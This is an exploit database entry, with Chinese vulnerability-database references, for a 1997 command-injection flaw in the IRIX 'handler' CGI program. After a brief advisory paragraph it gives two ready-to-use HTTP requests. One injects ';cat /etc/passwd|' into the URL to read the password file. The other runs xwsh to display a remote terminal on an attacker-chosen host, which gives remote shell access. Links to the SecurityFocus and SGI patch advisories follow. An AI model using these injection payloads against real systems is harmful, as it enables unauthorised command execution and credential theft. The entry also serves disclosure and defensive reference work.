https://www.exploit-db.com/exploits/19303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199709-004

IRIX的处理程序CGI允许任意命令的执行。

source: http://www.securityfocus.com/bid/380/info

A vulnerability exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. This vulnerability will allow a remote attacker to execute arbitrary commands on the vulnerable host as the user the web server is running as. This can easily result in a user being able to access the system.

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0

or:

telnet target.machine.com 80
GET /cgi-bin/handler/blah;/usr/sbin/xwsh -display yourhost.com|?data=Download

NOTE: large spaces are actually tabs.

来源:BID
名称:380
链接:http://www.securityfocus.com/bid/380
来源:SGI
名称:19970501-02-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19970501-02-PX